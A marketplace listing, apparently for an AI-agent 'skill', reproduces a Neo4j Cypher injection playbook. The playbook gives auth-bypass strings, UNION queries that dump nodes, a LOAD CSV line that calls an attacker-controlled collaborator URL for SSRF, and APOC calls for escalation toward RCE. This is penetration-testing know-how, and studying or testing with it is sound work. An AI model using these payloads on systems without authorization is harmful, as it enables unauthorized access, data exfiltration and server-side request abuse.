Cypher injection (Neo4j)
SkillSearchInject into Neo4j Cypher queries to bypass auth, exfiltrate graph data, and reach SSRF/RCE. Load when user input reaches a Cypher query (Neo4j-backed app, GraphQL/REST over a graph DB), a login, search, or filter that builds `MATCH (n {prop:'<input>'})`. Signals: Neo4j/Bolt (7687), `MATCH`/ `RETURN` in errors, `neo4j` cookies/stack traces, apoc procedures, a graph-backed search field.
Use Cypher injection (Neo4j) in Claude, ChatGPT or Ahel Desktop
Free. Sign in, add Cypher injection (Neo4j) and connect your AI. About a minute.
Also: Claude Code · Cursor · Codex
Then ask your AI: use the Cypher injection (Neo4j) skill
Details
Instructions available. Your AI can read the instructions. Execution depends on the setup they require.
Account requirements not reviewed. Check the skill instructions before use; Ahel provides instructions and does not run this skill.
No other account needed.
Add Ahel to your AI once: Claude, ChatGPT, Cursor, Claude Code or Codex. Then ask it to use this.
What this skill tells your AI
The instructions your AI receives, as published by noorqureshi/sploitagent in skills/web/web-cypher-injection/SKILL.md and read by Ahel’s review.
When it applies
An app builds a Neo4j Cypher query by concatenating user input — a login
(MATCH (u {name:'<in>', pass:'<in>'})), a search, or a filter. Like SQLi, mixing input into the
query language lets you change its meaning: bypass auth, read arbitrary nodes, or pivot to SSRF/RCE
via Cypher's data-loading and (mis)installed apoc procedures.
Why it works
Cypher is a query language with the same code/data confusion as SQL, plus graph-specific power:
UNION across labels, LOAD CSV FROM <url> (server-side fetch = SSRF), and — if apoc is present
and permissive — apoc.load.* / dbms.* that can reach the network or the OS.
Method
- Detect. Break the string context with
'and watch for a Cypher error (Neo.ClientError...,Invalid input). Try a self-true/false pair in a filter to confirm the input reaches the query. - Auth bypass / logic. Close the intended clause and inject your own predicate, e.g. a login
nameof' OR 1=1 RETURN u //or'}) RETURN u; //to return a user regardless of password (exact shape depends on the surrounding query — leak it first via errors). - Exfiltrate with UNION. Append
UNION MATCH (x) RETURN x(or target specific labels/props) to dump nodes beyond the intended result — enumerate labels/keys withdb.labels(),db.propertyKeys()where reachable. - SSRF via LOAD CSV.
... LOAD CSV FROM 'http://<your-collab>/' AS l RETURN lmakes the DB server fetch your URL — internal-service reach and blind confirmation via out-of-band callback. - APOC (if present) → deeper SSRF/RCE.
apoc.load.json('http://internal/...'),apoc.load.jdbc(...), or (badly configured) procedures that run OS/network actions. Treat anyapoc.*you can call as a strong escalation lead.
Gotchas
- Leak the surrounding query first (via errors) — the right break-out (
','},'})) depends on whether input is inside a property map, aWHERE, or a string literal. - Comment syntax is
//(to end of line) — use it to discard the rest of the app's query. LOAD CSV/apocmay be disabled — a blocked call is not proof of "not injectable"; the UNION/auth-bypass path can still work.- Confirm SSRF out-of-band (
web-ssrf) before claiming it; validate withreporting-triage-validation.
Verify success
Data or behavior you shouldn't get: an auth bypass returning another user, nodes from an
unintended label via UNION, or an out-of-band callback proving LOAD CSV/apoc SSRF.
References
Neo4j Cypher manual (LOAD CSV, apoc); OWASP injection; CWE-943 (query-language injection).
Related: web-sqli, web-ssrf, api-mongo-agg-facet-bypass.
Signals
- GitHub stars
- 20
- Forks
- 7
- Last commit
- Sep 2026
Advanced
- Item type
- skill
- Key
web-cypher-injection- Source
- github.com/noorqureshi/sploitagent
github.com/noorqureshi/sploitagent